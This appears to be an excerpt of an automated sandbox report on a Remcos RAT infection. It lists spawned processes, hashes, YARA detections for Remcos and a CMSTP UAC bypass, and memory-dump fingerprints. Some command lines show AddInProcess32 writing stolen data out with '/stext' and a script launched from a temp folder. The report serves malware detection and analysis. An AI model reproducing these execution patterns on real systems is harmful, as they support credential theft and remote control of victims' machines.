                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.2726582215.0000016510402000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000019.00000002.2726582215.0000016510402000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000002.2726582215.0000016510402000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Has exited:true

                                                    Target ID:26
                                                    Start time:01:09:25
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:27
                                                    Start time:01:09:28
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\wdxzjlwrwtnnhxspscqffyidgpjfmkcr"
                                                    Imagebase:0x670000
                                                    File size:43'008 bytes
                                                    MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:28
                                                    Start time:01:09:28
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ggckk"
                                                    Imagebase:0x4d0000
                                                    File size:43'008 bytes
                                                    MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:29
                                                    Start time:01:09:28
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\iaqclvrm"
                                                    Imagebase:0xd90000
                                                    File size:43'008 bytes
                                                    MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:30
                                                    Start time:01:09:28
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                    Imagebase:0x650000
                                                    File size:43'008 bytes
                                                    MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.2387288107.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    Has exited:true

                                                    Target ID:32
                                                    Start time:01:10:20
                                                    Start date:07/10/2024
                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\kevzykrtgrszbixbneqedqimjxlmbhz.vbs"
                                                    Imagebase:0x7e0000
                                                    File size:147'456 bytes
                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Reset < >
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.3186067674.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff848d80000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 328ad1266f5557886e03fd8e2320e8fcf69f7a4c57346bf934860876d3eb38b6
                                                      • Instruction ID: d3ebfeed482815e9c521c0c3cc8dedf286fe79876e5e90ad559cdd232e0ac857
                                                      • Opcode Fuzzy Hash: 328ad1266f5557886e03fd8e2320e8fcf69f7a4c57346bf934860876d3eb38b6
                                                      • Instruction Fuzzy Hash: CB01447115CB084FD748EF0CE491AB5B7E0FB95364F10056EE58AC3655D726E881CB45
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.3186067674.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ff848d80000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eccf6732d41793a318e826fb1f0ee65b9e7d8fe2d0056891affe48e9a7caedca
                                                      • Instruction ID: 0f26181dfce5cac2aa3b58e5600c4709b7b7ebdd2bd7b42f9b6380e5e0c9aac6
                                                      • Opcode Fuzzy Hash: eccf6732d41793a318e826fb1f0ee65b9e7d8fe2d0056891affe48e9a7caedca
                                                      • Instruction Fuzzy Hash: CF021531D0EA8A9FEB46EF2C9895AE97BA1FF51350F0400B6D45DC7193CB28A849C794
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3041567998.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a20cc0fa08f73a677f5c5129dadf17ae060b7b23f7679af93af12bd2862cb81a
                                                      • Instruction ID: ef9dd2f21a454f55e8427e35ffe56f3eeb6b6333f143e2a08aed2229e1c75fcb
                                                      • Opcode Fuzzy Hash: a20cc0fa08f73a677f5c5129dadf17ae060b7b23f7679af93af12bd2862cb81a
                                                      • Instruction Fuzzy Hash: A1C23631E0DB894FE79AAA2C98156B57BE1FF46260F0901FFD04DC71A3DE289C068756
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3041567998.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b6788cf9aeab2239a129ced58f88441ca375aad1b263bb54fb45cc85e2f3df4a
                                                      • Instruction ID: fcc8982168047b4f04b9cfb9824a3a35cc23d14b729815bd7ad6877e7a541495
                                                      • Opcode Fuzzy Hash: b6788cf9aeab2239a129ced58f88441ca375aad1b263bb54fb45cc85e2f3df4a
                                                      • Instruction Fuzzy Hash: C5A21821E1EACA4FE79AAB3818255B5BBE0FF56290F0805FBD04DC71D3DE289C458356
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3040288577.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: h9$x9
                                                      • API String ID: 0-1764393934
                                                      • Opcode ID: a09be25f298c4bc405b312274c638fb649fe269099581db0444e6b3584518612
                                                      • Instruction ID: 3ed0007fa167efed60638295b239242bb0229f37b94718dad2386005c53a92ca
                                                      • Opcode Fuzzy Hash: a09be25f298c4bc405b312274c638fb649fe269099581db0444e6b3584518612
                                                      • Instruction Fuzzy Hash: A8C1F430A1EA495FE785FB78842A6B9B7E2EF59350F1440BED00EC7297DE2C9C428715
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3040288577.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: h9$x9
                                                      • API String ID: 0-1764393934
                                                      • Opcode ID: aa83514edfaba265d5b3a71adfda72b1fd1d9fe970c384576d3282f9aef6af70
                                                      • Instruction ID: e15daa814f78bc96650877481cea2b11de4a1b502757e28a999318c26323f752
                                                      • Opcode Fuzzy Hash: aa83514edfaba265d5b3a71adfda72b1fd1d9fe970c384576d3282f9aef6af70
                                                      • Instruction Fuzzy Hash: 88613720A2EA826FE75AB73894171B9BBD1EF55360B1501FFC04AC72D7DE1C5C068356
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3040288577.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: x9
                                                      • API String ID: 0-2730778121
                                                      • Opcode ID: 700f033140c8a85fb04820b15174f29c2e54ba67c995e105edfcbda8a3109ae5
                                                      • Instruction ID: 4195c2329c27cb208a39619f72a822375d02a650e9f62b37190345599d06b6a7
                                                      • Opcode Fuzzy Hash: 700f033140c8a85fb04820b15174f29c2e54ba67c995e105edfcbda8a3109ae5
                                                      • Instruction Fuzzy Hash: 9B519530B1AA496FE785F778846A6BD77E2EF59240B4540BAD40EC73A7DE289C018711
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3041567998.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a464115f4b4a5c8edd140f9fdba214bc8d539eb90a74a8ad83e0102f89477f84
                                                      • Instruction ID: 71c5c2224b2ea8d7fd9c79f11fb01d16f06b964e1e504bb5ff949285ac39381a
                                                      • Opcode Fuzzy Hash: a464115f4b4a5c8edd140f9fdba214bc8d539eb90a74a8ad83e0102f89477f84
                                                      • Instruction Fuzzy Hash: 56524431A0EB894FE7AAAB2858155707BE1FF56360F0901FFD048C71E3DA29AC46C356
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3041567998.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5e97de4a0dd491f3c9054cd98955935e1b164505c64dc35395dbd937f98b4607
                                                      • Instruction ID: 0a72ba541bf6497010365858a73cf74f14db2a29d2ca88dc09e6f54cbc761cea
                                                      • Opcode Fuzzy Hash: 5e97de4a0dd491f3c9054cd98955935e1b164505c64dc35395dbd937f98b4607
                                                      • Instruction Fuzzy Hash: 7C511531E1DB894FE7A9AA1C885617477E1FF85650F0802BEC44DC71A2DB35AC0A8B86
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3040288577.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 268d4f31736e5dd7e36b6127f901641c4ef83dccdcdff3a8e46e2916963dc0cf
                                                      • Instruction ID: f8f4e5b016b52ceed25ff36c1f72b17f03c1f27ec1629efc357db7c69ddc5ec1
                                                      • Opcode Fuzzy Hash: 268d4f31736e5dd7e36b6127f901641c4ef83dccdcdff3a8e46e2916963dc0cf
                                                      • Instruction Fuzzy Hash: F2415B3090E7869FD742AB788456596BBD0EF42270F1506BFC0DAC71E2EB2D9807C705
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3041567998.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2f9675e085bf5f8295e5e2b713d1e7d062f394a580b0df2c522f58ac034bda0
                                                      • Instruction ID: aed11db52b7959cd35b30008fb3487deffe4c1663745684a2529b5abd89dc9c7
                                                      • Opcode Fuzzy Hash: a2f9675e085bf5f8295e5e2b713d1e7d062f394a580b0df2c522f58ac034bda0
                                                      • Instruction Fuzzy Hash: 0E411522E1FE875FF3AAB62C1456278E6C1FF452E0F5809BAD40DD31D3DE2CA805421A
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3040288577.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67292f2929a379eb0ae8bff63c4b2009e493541bc3c69a96fa73a7550af478b8
                                                      • Instruction ID: 53292020e406f01917dbe02b260af3923253c59951c2d2ad8fbb26878aea7ce9
                                                      • Opcode Fuzzy Hash: 67292f2929a379eb0ae8bff63c4b2009e493541bc3c69a96fa73a7550af478b8
                                                      • Instruction Fuzzy Hash: B1414830A0E7829FD752AB388456656BBE1EF46360F1506BEC0D6C72E6EB3C9C06C705
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3041567998.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e750950313a7e8cf61fd1c34eaab52d2ff00fc86b5e8aacb27a9b6089675aabf
                                                      • Instruction ID: 4a7e6870f3826eb53fb4dea7694bbb281e8b3039884dd36fbcbd7426f11042cc
                                                      • Opcode Fuzzy Hash: e750950313a7e8cf61fd1c34eaab52d2ff00fc86b5e8aacb27a9b6089675aabf
                                                      • Instruction Fuzzy Hash: AA31E322E1FA864FF7AA762C1465278A5C1FF056D6F4804BAD42EC71D3DE1DAC44431A
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3040288577.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4fbacfe18ab95ac835eedf71e7e8fbb689a2da962ecc91e59a384dc08b8bb934
                                                      • Instruction ID: 2ffda7be3ef090a976c7076cfdc4fc151d49f3af175b784ee31b3afa014b1e1d
                                                      • Opcode Fuzzy Hash: 4fbacfe18ab95ac835eedf71e7e8fbb689a2da962ecc91e59a384dc08b8bb934
                                                      • Instruction Fuzzy Hash: D2113661D0F5869FE399F674481B2BAABC2EF50691F0409FEC00AC32D7DD2C180A8715
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3040288577.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
                                                      • Instruction ID: 5721510348a8c6309dca3f9086684e9807743801a00cd0d143fe5051273dc993
                                                      • Opcode Fuzzy Hash: ee1d83e8d9ad0ff779d92e08f69f1e06b52c9e2b47039ca20a01433bafa786f3
                                                      • Instruction Fuzzy Hash: 0D01447115CB088FD748EF0CE451AB6B7E0FB95364F10056EE58AC3655D726E881CB45
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.3041567998.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 82025ef51efeea611dbe24b8121d31cfac34fc1d3be57be4a0d216a8887d0f7a
                                                      • Instruction ID: fce79b6c146a14bb03e11267bcd14561fc263b047322c6594d049c86085fe676
                                                      • Opcode Fuzzy Hash: 82025ef51efeea611dbe24b8121d31cfac34fc1d3be57be4a0d216a8887d0f7a
                                                      • Instruction Fuzzy Hash: 65E08663E1D8294EF2E1F15C74096F4D2C1FF486A1F9401B3D51ED3256DE189C1506DA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2836191266.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ;I$x:I$:I$:I$L_H
                                                      • API String ID: 0-3046693164
                                                      • Opcode ID: 55e31754bbf56957a36b3e4efc2a865860f4b9aad691c3b58efbd7b6a17f0f38
                                                      • Instruction ID: aa36cb933acfd754d4a9d996287970815351d0b522bcc0693b611bc2e6ea319e
                                                      • Opcode Fuzzy Hash: 55e31754bbf56957a36b3e4efc2a865860f4b9aad691c3b58efbd7b6a17f0f38
                                                      • Instruction Fuzzy Hash: 73825932E0DB894FE39AAB2C98156B47BE1FF56654F0901FBC04DC71A3DE289C068756
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2827317910.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TS_H
                                                      • API String ID: 0-1324703545
                                                      • Opcode ID: 7c4da710725a46cb7a2fb07a7ef7fab63203dbe20533e2ca30a12e3401e996a4
                                                      • Instruction ID: 7166f1d950805b373a30f93c86d356c638e05e49e398f61705ca17694fe62de2
                                                      • Opcode Fuzzy Hash: 7c4da710725a46cb7a2fb07a7ef7fab63203dbe20533e2ca30a12e3401e996a4
                                                      • Instruction Fuzzy Hash: E722C330A1DA498FDB98EF1CC495AB9B7E1FF58350F14017AD44AC7296DB35E886CB80
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2836191266.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: X7FU
                                                      • API String ID: 0-3019589308
                                                      • Opcode ID: 02af65e52cbf28b7919b0c29f73e0dd56196e0de3eb12a20ddf0076635e25d4c
                                                      • Instruction ID: a0e69994f400ba44161227a5bbc979dc49aa7c6aec398c2efb202959753ffdf8
                                                      • Opcode Fuzzy Hash: 02af65e52cbf28b7919b0c29f73e0dd56196e0de3eb12a20ddf0076635e25d4c
                                                      • Instruction Fuzzy Hash: D5D14471D0EACA9FE799AB2858155B57BE0FF16394F0802FAD44DC70E3EB289C058355
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2836191266.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: :I
                                                      • API String ID: 0-3697353549
                                                      • Opcode ID: 188dd61754999e2effb5f7dea33103e13673826cf834e9a10eb44439a5887819
                                                      • Instruction ID: 62cb3663bd0be0673003233c5ed6cb623792df1c718d79c0a03ab4d16df0c173
                                                      • Opcode Fuzzy Hash: 188dd61754999e2effb5f7dea33103e13673826cf834e9a10eb44439a5887819
                                                      • Instruction Fuzzy Hash: 7D21E432E1DA4B4FE3A9EA1C545157436D1FF652A8F4900BAC00ECB1E7CF28EC448349
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2827317910.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2260f3730e0aef86f1a9017a19a0f9ae77c26cb5ed2a7d2b951dc65d769ba413
                                                      • Instruction ID: 7f0c8fb9106ebae10f42614e094e71850eea0098c14f575c6d0eea6c64f9cfb8
                                                      • Opcode Fuzzy Hash: 2260f3730e0aef86f1a9017a19a0f9ae77c26cb5ed2a7d2b951dc65d769ba413
                                                      • Instruction Fuzzy Hash: 5D411A3190EB889FDB1D9B5CA8066B8BFE0FB65711F04416FD04983257DA34B859CBC6
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2816716262.00007FF848C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848c3d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2c646a320a5a7e32bed350b75d36f6d6a737ec3ecf5db33cb414a192ccf0cb69
                                                      • Instruction ID: 5be8df8d859cce384d07a574defa56be4ed3cdbcfd1998bc62f7580de72a2d09
                                                      • Opcode Fuzzy Hash: 2c646a320a5a7e32bed350b75d36f6d6a737ec3ecf5db33cb414a192ccf0cb69
                                                      • Instruction Fuzzy Hash: 1041057080DBC48FE796DB2898459523FF0EF57360F1501DFD088CB5A3D629A846C7A2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2827317910.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e7501426080168816c0c83b0e5713149a2487f7d96f9703c56c2e60d75107d40
                                                      • Instruction ID: 487b950f450d77e83b00fb805a5a857c96406b8356c16cf23b9103dd74bf6951
                                                      • Opcode Fuzzy Hash: e7501426080168816c0c83b0e5713149a2487f7d96f9703c56c2e60d75107d40
                                                      • Instruction Fuzzy Hash: 1731D43190E7884FDB59DF68984A7E97FF0EFA6321F0441ABD048C7163D635A849CB52
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2827317910.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 83dea5a7c68a493c438417abdb71c7247fdc83f2c958e1d5a6a6a812d19d36d6
                                                      • Instruction ID: 4e58469e42f94e93fb996a523322d7762e9883503bcc1b31e15cad1c21b504ad
                                                      • Opcode Fuzzy Hash: 83dea5a7c68a493c438417abdb71c7247fdc83f2c958e1d5a6a6a812d19d36d6
                                                      • Instruction Fuzzy Hash: 0321C07680F9D98FE706EB284CAA5A0BFA0FF21244F0800E7C488CB163EE161549C797
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2827317910.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction ID: d580fec08b658657cc7fabfc245c814a567e7b6e1804cbc3a87bca722c0ee82a
                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction Fuzzy Hash: A901843010CB0C4FD748EF0CE051AB5B3E0FB85360F10056EE58AC3661DB26E882CB45
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2836191266.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8c32f7c63fcd6cd9f80e4fd06b445802156743b11c8db7d9d9ca51c18fdc6e60
                                                      • Instruction ID: 7bfc3716e317c0d57b099894c5eb7159b4b96e10d90e506448d3284707d6eda0
                                                      • Opcode Fuzzy Hash: 8c32f7c63fcd6cd9f80e4fd06b445802156743b11c8db7d9d9ca51c18fdc6e60
                                                      • Instruction Fuzzy Hash: B1F08C31A4D5448FD759EB1CE4418A8B7E0FF45364B5500F6E14DCB063DB3AAC51C754
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2827317910.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: N_^=$N_^@$N_^T$N_^U$N_^W$N_^Y
                                                      • API String ID: 0-17849902
                                                      • Opcode ID: afc1862cce5467799516e70d9e20a1ad307e5fbfa3f8a799eea96af8ed92217d
                                                      • Instruction ID: b035ecca24f15b7a50d190bbaed7bbafada32072dcb7b6ba3d7f326ad6f72d40
                                                      • Opcode Fuzzy Hash: afc1862cce5467799516e70d9e20a1ad307e5fbfa3f8a799eea96af8ed92217d
                                                      • Instruction Fuzzy Hash: F6213873B1A5256AD30136ADBC612E87740EF903B2B4605F3D359CF203DD24648B86E6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.2827317910.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff848d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: N_^$N_^$N_^$N_^$N_^
                                                      • API String ID: 0-2528851458
                                                      • Opcode ID: 612d4cfb003ab562df42001f0e8e7fa5fa11a284ce87ee3a0e076bf1e0a97e8f
                                                      • Instruction ID: ba64b128115be794e0e3ca739676417112e0f9c2cde4569cdf27d349aa46a50b
                                                      • Opcode Fuzzy Hash: 612d4cfb003ab562df42001f0e8e7fa5fa11a284ce87ee3a0e076bf1e0a97e8f
                                                      • Instruction Fuzzy Hash: D821D573E0F9C25FF386663C5C6919BAFD0FF62364B0904F3C098C70A2EA05580B9215
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2866180098.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 977d521683a33d11adff1ad100e277558232951d46dd4db1486d6851885e9719
                                                      • Instruction ID: d221f1e3a916d3eec8db74aa7ad80c15d0f0007faa388c7e9cbfed9bf987043a
                                                      • Opcode Fuzzy Hash: 977d521683a33d11adff1ad100e277558232951d46dd4db1486d6851885e9719
                                                      • Instruction Fuzzy Hash: E1121722E0DBC94FE396A62C98555B47BE1FF567A0F0901FBC04DC71A3DE289C068766
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2866180098.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: x:I$:I$:I$L_H
                                                      • API String ID: 0-656493276
